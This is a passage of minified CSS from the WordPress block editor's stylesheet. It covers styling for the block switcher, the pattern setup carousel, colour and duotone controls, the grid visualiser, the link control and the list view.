#1e1e1e}.block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item .block-editor-block-switcher__preview-patterns-container-list__item-title{cursor:pointer;font-size:12px;padding:4px;text-align:center}.block-editor-block-switcher__no-transforms{color:#757575;margin:0;padding:6px 8px}.block-editor-block-switcher__binding-indicator{display:block;padding:8px}.block-editor-block-types-list>[role=presentation]{display:flex;flex-wrap:wrap;overflow:hidden}.block-editor-block-pattern-setup{align-items:flex-start;border-radius:2px;display:flex;flex-direction:column;justify-content:center;width:100%}.block-editor-block-pattern-setup.view-mode-grid{padding-top:4px}.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__toolbar{justify-content:center}.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container{column-count:2;column-gap:24px;display:block;padding:0 32px;width:100%}@media (min-width:1440px){.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container{column-count:3}}.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-preview__container,.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container div[role=button]{cursor:pointer}.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__item{scroll-margin:5px 0}.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__item:hover .block-editor-block-preview__container{box-shadow:0 0 0 2px var(--wp-admin-theme-color)}.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__item:focus .block-editor-block-preview__container{box-shadow:0 0 0 var(--wp-admin-border-width-focus) #fff,0 0 0 calc(var(--wp-admin-border-width-focus)*2) var(--wp-admin-theme-color);outline:2px solid #0000;outline-offset:2px}.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__item:focus .block-editor-block-pattern-setup-list__item-title,.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__item:hover .block-editor-block-pattern-setup-list__item-title{color:var(--wp-admin-theme-color)}.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__list-item{break-inside:avoid-column;margin-bottom:24px}.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__list-item .block-editor-block-pattern-setup-list__item-title{cursor:pointer;font-size:12px;padding-top:8px;text-align:center}.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__list-item .block-editor-block-preview__container{border:1px solid #ddd;border-radius:4px;min-height:100px}.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__list-item .block-editor-block-preview__content{width:100%}.block-editor-block-pattern-setup .block-editor-block-pattern-setup__toolbar{align-items:center;align-self:stretch;background-color:#fff;border-top:1px solid #ddd;bottom:0;box-sizing:border-box;color:#1e1e1e;display:flex;flex-direction:row;height:64px;justify-content:space-between;margin:0;padding:16px;position:absolute;text-align:left;width:100%}.block-editor-block-pattern-setup .block-editor-block-pattern-setup__toolbar .block-editor-block-pattern-setup__display-controls{display:flex}.block-editor-block-pattern-setup .block-editor-block-pattern-setup__toolbar .block-editor-block-pattern-setup__actions,.block-editor-block-pattern-setup .block-editor-block-pattern-setup__toolbar .block-editor-block-pattern-setup__navigation{display:flex;width:calc(50% - 36px)}.block-editor-block-pattern-setup .block-editor-block-pattern-setup__toolbar .block-editor-block-pattern-setup__actions{justify-content:flex-end}.block-editor-block-pattern-setup .block-editor-block-pattern-setup__container{box-sizing:border-box;display:flex;flex-direction:column;height:100%;width:100%}.block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container{height:100%;list-style:none;margin:0;overflow:hidden;padding:0;position:relative;transform-style:preserve-3d}.block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container *{box-sizing:border-box}.block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container .pattern-slide{background-color:#fff;height:100%;margin:auto;padding:0;position:absolute;top:0;width:100%}@media not (prefers-reduced-motion){.block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container .pattern-slide{transition:transform .5s,z-index .5s}}.block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container .pattern-slide{z-index:100}.block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container .pattern-slide.active-slide{opacity:1;position:relative;z-index:102}.block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container .pattern-slide.previous-slide{transform:translateX(-100%);z-index:101}.block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container .pattern-slide.next-slide{transform:translateX(100%);z-index:101}.block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .block-list-appender{display:none}.block-editor-block-pattern-setup__carousel,.block-editor-block-pattern-setup__grid{width:100%}.block-editor-block-variation-transforms:where(fieldset){border:0;margin:0;padding:0}.block-editor-block-variation-transforms{box-sizing:border-box;padding:0 16px 16px 52px;width:100%}.block-editor-block-variation-transforms .components-dropdown-menu__toggle{border:1px solid #757575;border-radius:2px;justify-content:left;min-height:30px;padding:6px 12px;position:relative;text-align:left;width:100%}.block-editor-block-variation-transforms .components-dropdown-menu__toggle.components-dropdown-menu__toggle{padding-right:24px}.block-editor-block-variation-transforms .components-dropdown-menu__toggle:focus:not(:disabled){border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 calc(var(--wp-admin-border-width-focus) - 1px) var(--wp-admin-theme-color)}.block-editor-block-variation-transforms .components-dropdown-menu__toggle svg{height:100%;padding:0;position:absolute;right:0;top:0}.block-editor-block-variation-transforms__popover .components-popover__content{min-width:230px}.components-border-radius-control__header{height:16px;margin-bottom:12px}.components-border-radius-control{border:0;margin:0 0 12px;padding:0}.components-border-radius-control legend{margin-bottom:0}.components-border-radius-control .components-border-radius-control__input-controls-wrapper{display:grid;gap:16px;grid-template-columns:repeat(2,minmax(0,1fr));margin-right:12px}.components-border-radius-control .components-border-radius-control__linked-button{display:flex;justify-content:center}.components-border-radius-control .components-border-radius-control__linked-button svg{margin-right:0}.components-border-radius-control__custom-select-control,.components-border-radius-control__range-control{flex:1}.components-border-radius-control__icon{flex:0 0 auto}.block-editor-color-gradient-control .block-editor-color-gradient-control__color-indicator{margin-bottom:12px}.block-editor-color-gradient-control__fieldset{border:0;margin:0;min-width:0;padding:0}.block-editor-panel-color-gradient-settings.block-editor-panel-color-gradient-settings,.block-editor-panel-color-gradient-settings.block-editor-panel-color-gradient-settings>div:not(:first-of-type){display:block}@media screen and (min-width:782px){.block-editor-panel-color-gradient-settings .components-circular-option-picker__swatches{display:grid;grid-template-columns:repeat(6,28px)}}.block-editor-block-inspector .block-editor-panel-color-gradient-settings .components-base-control{margin-bottom:inherit}.block-editor-panel-color-gradient-settings__dropdown-content{min-height:160px}.block-editor-panel-color-gradient-settings__dropdown-content .block-editor-color-gradient-control__panel{padding:16px;width:260px}.block-editor-panel-color-gradient-settings__color-indicator{background:linear-gradient(-45deg,#0000 48%,#ddd 0,#ddd 52%,#0000 0)}.block-editor-tools-panel-color-gradient-settings__item{border-bottom:1px solid #ddd;border-left:1px solid #ddd;border-right:1px solid #ddd;max-width:100%;padding:0;position:relative}.block-editor-tools-panel-color-gradient-settings__item:nth-child(1 of .block-editor-tools-panel-color-gradient-settings__item){border-top:1px solid #ddd;border-top-left-radius:2px;border-top-right-radius:2px;margin-top:24px}.block-editor-tools-panel-color-gradient-settings__item:nth-last-child(1 of .block-editor-tools-panel-color-gradient-settings__item){border-bottom-left-radius:2px;border-bottom-right-radius:2px}.block-editor-tools-panel-color-gradient-settings__item>div,.block-editor-tools-panel-color-gradient-settings__item>div>button{border-radius:inherit}.block-editor-tools-panel-color-gradient-settings__dropdown{display:block;padding:0}.block-editor-tools-panel-color-gradient-settings__dropdown>button{height:auto;padding-bottom:10px;padding-top:10px;text-align:left}.block-editor-tools-panel-color-gradient-settings__dropdown>button.is-open{background:#f0f0f0;color:var(--wp-admin-theme-color)}.block-editor-tools-panel-color-gradient-settings__dropdown .block-editor-panel-color-gradient-settings__color-name{max-width:calc(100% - 44px);overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.block-editor-panel-color-gradient-settings__dropdown{width:100%}.block-editor-panel-color-gradient-settings__dropdown .component-color-indicator{flex-shrink:0}.block-editor-panel-color-gradient-settings__reset{margin:auto 8px;opacity:0;position:absolute;right:0;top:8px}@media not (prefers-reduced-motion){.block-editor-panel-color-gradient-settings__reset{transition:opacity .1s ease-in-out}}.block-editor-panel-color-gradient-settings__reset.block-editor-panel-color-gradient-settings__reset{border-radius:2px}.block-editor-panel-color-gradient-settings__dropdown:hover+.block-editor-panel-color-gradient-settings__reset,.block-editor-panel-color-gradient-settings__reset:focus,.block-editor-panel-color-gradient-settings__reset:hover{opacity:1}@media (hover:none){.block-editor-panel-color-gradient-settings__reset{opacity:1}}.block-editor-date-format-picker{border:none;margin:0 0 16px;padding:0}.block-editor-date-format-picker__custom-format-select-control__custom-option{border-top:1px solid #ddd}.block-editor-duotone-control__popover.components-popover>.components-popover__content{padding:8px;width:260px}.block-editor-duotone-control__popover.components-popover .components-menu-group__label{padding:0}.block-editor-duotone-control__popover.components-popover .components-circular-option-picker__swatches{display:grid;gap:12px;grid-template-columns:repeat(6,28px);justify-content:space-between}.block-editor-duotone-control__unset-indicator{background:linear-gradient(-45deg,#0000 48%,#ddd 0,#ddd 52%,#0000 0)}.components-font-appearance-control [role=option]{color:#1e1e1e;text-transform:capitalize}.block-editor-font-family-control:not(.is-next-has-no-margin-bottom){margin-bottom:8px}.block-editor-global-styles__toggle-icon{fill:currentColor}.block-editor-global-styles__shadow-popover-container{width:230px}.block-editor-global-styles__shadow__list{display:flex;flex-wrap:wrap;gap:12px;padding-bottom:8px}.block-editor-global-styles__clear-shadow{text-align:right}.block-editor-global-styles-filters-panel__dropdown,.block-editor-global-styles__shadow-dropdown{border:1px solid #ddd;border-radius:2px;display:block;padding:0;position:relative}.block-editor-global-styles-filters-panel__dropdown-toggle,.block-editor-global-styles__shadow-dropdown-toggle{padding:8px;width:100%}.block-editor-global-styles-filters-panel__dropdown-toggle.is-open,.block-editor-global-styles__shadow-dropdown-toggle.is-open{background-color:#f0f0f0}.block-editor-global-styles__shadow-editor__remove-button{margin:auto 8px;opacity:0;position:absolute;right:0;top:8px}@media not (prefers-reduced-motion){.block-editor-global-styles__shadow-editor__remove-button{transition:opacity .1s ease-in-out}}.block-editor-global-styles__shadow-dropdown:hover .block-editor-global-styles__shadow-editor__remove-button,.block-editor-global-styles__shadow-editor__remove-button:focus,.block-editor-global-styles__shadow-editor__remove-button:hover{opacity:1}@media (hover:none){.block-editor-global-styles__shadow-editor__remove-button{opacity:1}}.block-editor-global-styles__shadow-indicator{align-items:center;appearance:none;background:none;border:1px solid #e0e0e0;border-radius:2px;box-sizing:border-box;color:#2f2f2f;cursor:pointer;display:inline-flex;height:26px;padding:0;transform:scale(1);width:26px}@media not (prefers-reduced-motion){.block-editor-global-styles__shadow-indicator{transition:transform .1s ease}}.block-editor-global-styles__shadow-indicator{will-change:transform}.block-editor-global-styles__shadow-indicator:focus{border:2px solid #757575}.block-editor-global-styles__shadow-indicator:hover{transform:scale(1.2)}.block-editor-global-styles__shadow-indicator.unset{background:linear-gradient(-45deg,#0000 48%,#ddd 0,#ddd 52%,#0000 0)}.block-editor-global-styles-advanced-panel__custom-css-input textarea{direction:ltr;font-family:Menlo,Consolas,monaco,monospace}.block-editor-panel-duotone-settings__reset{margin:auto 8px;opacity:0;position:absolute;right:0;top:8px}@media not (prefers-reduced-motion){.block-editor-panel-duotone-settings__reset{transition:opacity .1s ease-in-out}}.block-editor-global-styles-filters-panel__dropdown:hover .block-editor-panel-duotone-settings__reset,.block-editor-panel-duotone-settings__reset:focus,.block-editor-panel-duotone-settings__reset:hover{opacity:1}@media (hover:none){.block-editor-panel-duotone-settings__reset{opacity:1}}.block-editor-grid-visualizer.block-editor-grid-visualizer.block-editor-grid-visualizer{z-index:30}.block-editor-grid-visualizer.block-editor-grid-visualizer.block-editor-grid-visualizer .components-popover__content *{pointer-events:none}.block-editor-grid-visualizer.block-editor-grid-visualizer.block-editor-grid-visualizer.is-dropping-allowed .block-editor-grid-visualizer__drop-zone{pointer-events:all}.block-editor-grid-visualizer.block-editor-grid-visualizer.block-editor-grid-visualizer .block-editor-inserter *{pointer-events:auto}.block-editor-grid-visualizer__grid{display:grid;position:absolute}.block-editor-grid-visualizer__cell{display:grid;position:relative}.block-editor-grid-visualizer__cell .block-editor-inserter{bottom:0;color:inherit;left:0;overflow:hidden;position:absolute;right:0;top:0;z-index:32}.block-editor-grid-visualizer__cell .block-editor-inserter .block-editor-grid-visualizer__appender{box-shadow:inset 0 0 0 1px color-mix(in srgb,currentColor 20%,#0000);color:inherit;height:100%;opacity:0;overflow:hidden;padding:0!important;width:100%}.block-editor-grid-visualizer__cell.is-highlighted .block-editor-grid-visualizer__drop-zone,.block-editor-grid-visualizer__cell.is-highlighted .block-editor-inserter{background:var(--wp-admin-theme-color)}.block-editor-grid-visualizer__cell .block-editor-grid-visualizer__appender:focus,.block-editor-grid-visualizer__cell:hover .block-editor-grid-visualizer__appender{background-color:color-mix(in srgb,currentColor 20%,#0000);opacity:1}.block-editor-grid-visualizer__drop-zone{background:#cccccc1a;grid-column:1;grid-row:1;height:100%;min-height:8px;min-width:8px;width:100%}.block-editor-grid-item-resizer.block-editor-grid-item-resizer.block-editor-grid-item-resizer{z-index:30}.block-editor-grid-item-resizer.block-editor-grid-item-resizer.block-editor-grid-item-resizer .components-popover__content *{pointer-events:none}.block-editor-grid-item-resizer__box{border:1px solid var(--wp-admin-theme-color)}.block-editor-grid-item-resizer__box .components-resizable-box__handle.components-resizable-box__handle.components-resizable-box__handle{pointer-events:all}.block-editor-grid-item-mover__move-button-container{border:none;display:flex;justify-content:center;padding:0}.block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button{min-width:0!important;padding-left:0;padding-right:0;width:24px}.block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button svg{min-width:24px}.block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button:before{border-radius:2px;content:"";display:block;height:32px;left:8px;position:absolute;right:8px;z-index:-1}@media not (prefers-reduced-motion){.block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button:before{animation:components-button__appear-animation .1s ease;animation-fill-mode:forwards}}.block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button:focus,.block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button:focus:before,.block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button:focus:enabled{box-shadow:none;outline:none}.block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button:focus-visible:before{box-shadow:inset 0 0 0 1px #fff,0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid #0000}.block-editor-grid-item-mover__move-vertical-button-container{display:flex;position:relative}@media (min-width:600px){.block-editor-grid-item-mover__move-vertical-button-container{flex-direction:column;justify-content:space-around}.block-editor-grid-item-mover__move-vertical-button-container>.block-editor-grid-item-mover-button.block-editor-grid-item-mover-button{height:20px!important;min-width:0!important;width:100%}.block-editor-grid-item-mover__move-vertical-button-container>.block-editor-grid-item-mover-button.block-editor-grid-item-mover-button:before{height:calc(100% - 4px)}.block-editor-grid-item-mover__move-vertical-button-container .block-editor-grid-item-mover-button.is-down-button svg,.block-editor-grid-item-mover__move-vertical-button-container .block-editor-grid-item-mover-button.is-up-button svg{flex-shrink:0;height:20px}.editor-collapsible-block-toolbar .block-editor-grid-item-mover__move-vertical-button-container{height:40px;position:relative;top:-4px}}.show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container{position:relative}@media (min-width:600px){.show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container:before{background:#e0e0e0;content:"";height:100%;position:absolute;top:0;width:1px}}@media (min-width:782px){.show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container:before{background:#1e1e1e}}.show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container.is-left{padding-right:6px}.show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container.is-left:before{right:0}.show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container.is-right{padding-left:6px}.show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container.is-right:before{left:0}@media (min-width:600px){.show-icon-labels .block-editor-grid-item-mover__move-vertical-button-container:before{background:#e0e0e0;content:"";height:1px;left:50%;margin-top:-.5px;position:absolute;top:50%;transform:translate(-50%);width:100%}}@media (min-width:782px){.show-icon-labels .block-editor-grid-item-mover__move-vertical-button-container:before{background:#1e1e1e}}.show-icon-labels .block-editor-grid-item-mover-button{white-space:nowrap}.show-icon-labels .editor-collapsible-block-toolbar .block-editor-grid-item-mover__move-horizontal-button-container:before{background:#ddd;height:24px;top:4px}.show-icon-labels .editor-collapsible-block-toolbar .block-editor-grid-item-mover__move-vertical-button-container:before{background:#ddd;width:calc(100% - 24px)}.block-editor-height-control{border:0;margin:0;padding:0}.block-editor-iframe__container{height:100%;width:100%}.block-editor-iframe__scale-container{height:100%}.block-editor-iframe__scale-container.is-zoomed-out{position:absolute;right:0;width:var(--wp-block-editor-iframe-zoom-out-scale-container-width,100vw)}.block-editor-block-types-list__list-item{display:block;margin:0;padding:0;width:33.33%}.block-editor-block-types-list__list-item.is-synced .components-button.block-editor-block-types-list__item:not(:disabled) .block-editor-block-icon.has-colors{color:var(--wp-block-synced-color)}.block-editor-block-types-list__list-item.is-synced .components-button.block-editor-block-types-list__item:not(:disabled):hover .block-editor-block-types-list__item-title{color:var(--wp-block-synced-color)!important;filter:brightness(.95)}.block-editor-block-types-list__list-item.is-synced .components-button.block-editor-block-types-list__item:not(:disabled):hover svg{color:var(--wp-block-synced-color)!important}.block-editor-block-types-list__list-item.is-synced .components-button.block-editor-block-types-list__item:not(:disabled):after{background:var(--wp-block-synced-color)}.components-button.block-editor-block-types-list__item{align-items:stretch;background:#0000;color:#1e1e1e;cursor:pointer;display:flex;flex-direction:column;font-size:13px;justify-content:center;padding:8px;width:100%;word-break:break-word}@media not (prefers-reduced-motion){.components-button.block-editor-block-types-list__item{transition:all .05s ease-in-out}}.components-button.block-editor-block-types-list__item{height:auto;position:relative}.components-button.block-editor-block-types-list__item:disabled,.components-button.block-editor-block-types-list__item[aria-disabled=true]{cursor:default;opacity:.6}.components-button.block-editor-block-types-list__item:not(:disabled,[aria-disabled=true]):hover .block-editor-block-types-list__item-title{color:var(--wp-admin-theme-color)!important;filter:brightness(.95)}.components-button.block-editor-block-types-list__item:not(:disabled,[aria-disabled=true]):hover svg{color:var(--wp-admin-theme-color)!important}.components-button.block-editor-block-types-list__item:not(:disabled,[aria-disabled=true]):hover:after{background:var(--wp-admin-theme-color);border-radius:2px;bottom:0;content:"";left:0;opacity:.04;pointer-events:none;position:absolute;right:0;top:0}.components-button.block-editor-block-types-list__item:not(:disabled,[aria-disabled=true]).is-active{background:#1e1e1e;color:#fff;outline:2px solid #0000;outline-offset:-2px}.components-button.block-editor-block-types-list__item:not(:disabled):focus{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.block-editor-block-types-list__item-icon{color:#1e1e1e;padding:12px 20px}@media not (prefers-reduced-motion){.block-editor-block-types-list__item-icon{transition:all .05s ease-in-out}}.block-editor-block-types-list__item-icon .block-editor-block-icon{margin-left:auto;margin-right:auto}@media not (prefers-reduced-motion){.block-editor-block-types-list__item-icon svg{transition:all .15s ease-out}}.block-editor-block-types-list__list-item[draggable=true] .block-editor-block-types-list__item-icon{cursor:grab}.block-editor-block-types-list__item-title{font-size:12px;hyphens:auto;padding:4px 2px 8px}.block-editor-block-inspector__tabs [role=tablist]{width:100%}.block-editor-inspector-popover-header{margin-bottom:16px}.items-justified-left{justify-content:flex-start}.items-justified-center{justify-content:center}.items-justified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}@keyframes loadingpulse{0%{opacity:1}50%{opacity:0}to{opacity:1}}.block-editor-link-control{min-width:350px;position:relative}.components-popover__content .block-editor-link-control{max-width:350px;min-width:auto;width:90vw}.show-icon-labels .block-editor-link-control .components-button.has-icon svg{display:none}.show-icon-labels .block-editor-link-control .components-button.has-icon:before{content:attr(aria-label)}.show-icon-labels .block-editor-link-control .block-editor-link-control__search-item-top{flex-wrap:wrap;gap:4px}.show-icon-labels .block-editor-link-control .block-editor-link-control__search-item-top .components-button.has-icon{padding:4px;width:auto}.show-icon-labels .block-editor-link-control .is-preview .block-editor-link-control__search-item-header{margin-right:0;min-width:100%}.block-editor-link-control__search-input-wrapper{margin-bottom:8px;position:relative}.block-editor-link-control__help{color:#757575;font-size:12px;font-style:normal;margin-bottom:0;margin-top:-8px;padding:0 16px}.block-editor-link-control__search-input-container,.block-editor-link-control__search-input-wrapper{position:relative}.block-editor-link-control__field{margin:16px}.block-editor-link-control__field .components-base-control__label{color:#1e1e1e}.block-editor-link-control__search-error{margin:-8px 16px 16px}.block-editor-link-control__search-actions{padding:8px 16px 16px}.block-editor-link-control__search-results-wrapper{position:relative}.block-editor-link-control__search-results-wrapper:after,.block-editor-link-control__search-results-wrapper:before{content:"";display:block;left:-1px;pointer-events:none;position:absolute;right:16px;z-index:100}.block-editor-link-control__search-results-wrapper:before{bottom:auto;height:8px;top:0}.block-editor-link-control__search-results-wrapper:after{bottom:0;height:16px;top:auto}.block-editor-link-control__search-results{margin-top:-16px;max-height:200px;overflow-y:auto;padding:8px}.block-editor-link-control__search-results.is-loading{opacity:.2}.block-editor-link-control__search-item.components-button.components-menu-item__button{height:auto;text-align:left}.block-editor-link-control__search-item .components-menu-item__item{display:inline-block;overflow:hidden;text-overflow:ellipsis;width:100%}.block-editor-link-control__search-item .components-menu-item__item mark{background-color:initial;color:inherit;font-weight:600}.block-editor-link-control__search-item .components-menu-item__shortcut{color:#757575;white-space:nowrap}.block-editor-link-control__search-item[aria-selected]{background:#f0f0f0}.block-editor-link-control__search-item.is-current{background:#0000;border:0;cursor:default;flex-direction:column;padding:16px;width:100%}.block-editor-link-control__search-item .block-editor-link-control__search-item-header{align-items:center;display:block;flex-direction:row;gap:8px;margin-right:8px;overflow-wrap:break-word;white-space:pre-wrap}.block-editor-link-control__search-item .block-editor-link-control__search-item-header .block-editor-link-control__search-item-info{color:#757575;font-size:12px;line-height:1.1;word-break:break-all}.block-editor-link-control__search-item.is-preview .block-editor-link-control__search-item-header{display:flex;flex:1}.block-editor-link-control__search-item.is-error .block-editor-link-control__search-item-header{align-items:center}.block-editor-link-control__search-item.is-url-title .block-editor-link-control__search-item-title{word-break:break-all}.block-editor-link-control__search-item .block-editor-link-control__search-item-details{display:flex;flex-direction:column;gap:4px;justify-content:space-between}.block-editor-link-control__search-item .block-editor-link-control__search-item-header .block-editor-link-control__search-item-icon{background-color:#f0f0f0;border-radius:2px;height:32px;width:32px}.block-editor-link-control__search-item .block-editor-link-control__search-item-icon{align-items:center;display:flex;flex-shrink:0;justify-content:center;position:relative}.block-editor-link-control__search-item .block-editor-link-control__search-item-icon img{width:16px}.block-editor-link-control__search-item.is-error .block-editor-link-control__search-item-icon{max-height:32px;top:0;width:32px}.block-editor-link-control__search-item .block-editor-link-control__search-item-title{line-height:1.1}.block-editor-link-control__search-item .block-editor-link-control__search-item-title:focus{box-shadow:none}.block-editor-link-control__search-item .block-editor-link-control__search-item-title:focus-visible{box-shadow:inset 0 0 0 1px #fff,0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid #0000;text-decoration:none}.block-editor-link-control__search-item .block-editor-link-control__search-item-title mark{background-color:initial;color:inherit;font-weight:600}.block-editor-link-control__search-item .block-editor-link-control__search-item-title span{font-weight:400}.block-editor-link-control__search-item .block-editor-link-control__search-item-title .components-external-link__icon{height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;clip:rect(0,0,0,0);border:0}.block-editor-link-control__search-item-top{align-items:center;display:flex;flex-direction:row;width:100%}.block-editor-link-control__search-item.is-fetching .block-editor-link-control__search-item-icon img,.block-editor-link-control__search-item.is-fetching .block-editor-link-control__search-item-icon svg{opacity:0}.block-editor-link-control__search-item.is-fetching .block-editor-link-control__search-item-icon:before{background-color:#f0f0f0;border-radius:100%;bottom:0;content:"";display:block;left:0;position:absolute;right:0;top:0}@media not (prefers-reduced-motion){.block-editor-link-control__search-item.is-fetching .block-editor-link-control__search-item-icon:before{animation:loadingpulse 1s linear infinite;animation-delay:.5s}}.block-editor-link-control__loading{align-items:center;display:flex;margin:16px}.block-editor-link-control__loading .components-spinner{margin-top:0}.components-button+.block-editor-link-control__search-create{overflow:visible;padding:12px 16px}.components-button+.block-editor-link-control__search-create:before{content:"";display:block;left:0;position:absolute;top:-10px;width:100%}.block-editor-link-control__search-create{align-items:center}.block-editor-link-control__search-create .block-editor-link-control__search-item-title{margin-bottom:0}.block-editor-link-control__search-create .block-editor-link-control__search-item-icon{top:0}.block-editor-link-control__drawer-inner{display:flex;flex-basis:100%;flex-direction:column;position:relative}.block-editor-link-control__settings{border:0;margin:0;padding:0}.block-editor-link-control__setting{flex:1;margin-bottom:0;padding:8px 24px}.block-editor-link-control__setting .components-base-control:not(.components-input-control) .components-base-control__field{display:flex}.block-editor-link-control__setting .components-base-control__field .components-checkbox-control__label{color:#1e1e1e}.block-editor-link-control__setting input{margin-left:0}.is-preview .block-editor-link-control__setting{padding:20px 8px 8px 0}.block-editor-link-control__tools{margin-top:-16px;padding:8px 8px 0}.block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle{gap:0;padding-left:0}.block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle[aria-expanded=true]{color:#1e1e1e}.block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle[aria-expanded=true] svg{visibility:visible}@media not (prefers-reduced-motion){.block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle[aria-expanded=true] svg{transition:transform .1s ease}}.block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle[aria-expanded=true] svg{transform:rotate(90deg)}.block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle[aria-expanded=false] svg{transform:rotate(0deg);visibility:visible}@media not (prefers-reduced-motion){.block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle[aria-expanded=false] svg{transition:transform .1s ease}}.block-editor-link-control .block-editor-link-control__search-input .components-spinner{display:block}.block-editor-link-control .block-editor-link-control__search-input .components-spinner.components-spinner{bottom:auto;left:auto;position:absolute;right:40px;top:calc(50% - 8px)}.block-editor-link-control .block-editor-link-control__search-input-wrapper.has-actions .components-spinner{right:12px;top:calc(50% + 4px)}.block-editor-list-view-tree{border-collapse:collapse;margin:0;padding:0;width:100%}.components-modal__content .block-editor-list-view-tree{margin:-12px -6px 0;width:calc(100% + 12px)}.block-editor-list-view-tree.is-dragging tbody{pointer-events:none}.block-editor-list-view-leaf{position:relative;transform:translateY(0)}.block-editor-list-view-leaf.is-draggable,.block-editor-list-view-leaf.is-draggable .block-editor-list-view-block-contents{cursor:grab}.block-editor-list-view-leaf .block-editor-list-view-block-select-button[aria-expanded=true]{color:inherit}.block-editor-list-view-leaf .block-editor-list-view-block-select-button:hover{color:var(--wp-admin-theme-color)}.block-editor-list-view-leaf .block-editor-list-view-block-select-button svg{fill:currentColor}@media (forced-colors:active){.block-editor-list-view-leaf .block-editor-list-view-block-select-button svg{fill:CanvasText}}.is-dragging-components-draggable .block-editor-list-view-leaf:not(.is-selected) .block-editor-list-view-block-select-button:hover{color:inherit}.block-editor-list-view-leaf.is-selected td{background:var(--wp-admin-theme-color)}.block-editor-list-view-leaf.is-selected.is-synced td{background:var(--wp-block-synced-color)}.block-editor-list-view-leaf.is-synced:not(.is-selected) .block-editor-list-view-block-contents .block-editor-block-icon,.block-editor-list-view-leaf.is-synced:not(.is-selected) .block-editor-list-view-block-contents:focus,.block-editor-list-view-leaf.is-synced:not(.is-selected) .block-editor-list-view-block-contents:hover{color:var(--wp-block-synced-color)}.block-editor-list-view-leaf.is-synced:not(.is-selected) .block-editor-list-view-block-contents:focus:after{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-block-synced-color)}.block-editor-list-view-leaf.is-selected .block-editor-list-view-block-contents,.block-editor-list-view-leaf.is-selected .components-button.has-icon{color:#fff}.block-editor-list-view-leaf.is-selected .block-editor-list-view-block-contents:focus:after{box-shadow:inset 0 0 0 1px #fff,0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.block-editor-list-view-leaf.is-selected.is-synced .block-editor-list-view-block-contents:focus:after{box-shadow:inset 0 0 0 1px #fff,0 0 0 var(--wp-admin-border-width-focus) var(--wp-block-synced-color)}.block-editor-list-view-leaf.is-selected .block-editor-list-view-block__menu:focus{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) #fff}.block-editor-list-view-leaf.is-first-selected td:first-child{border-top-left-radius:2px}.block-editor-list-view-leaf.is-first-selected td:last-child{border-top-right-radius:2px}.block-editor-list-view-leaf.is-last-selected td:first-child{border-bottom-left-radius:2px}.block-editor-list-view-leaf.is-last-selected 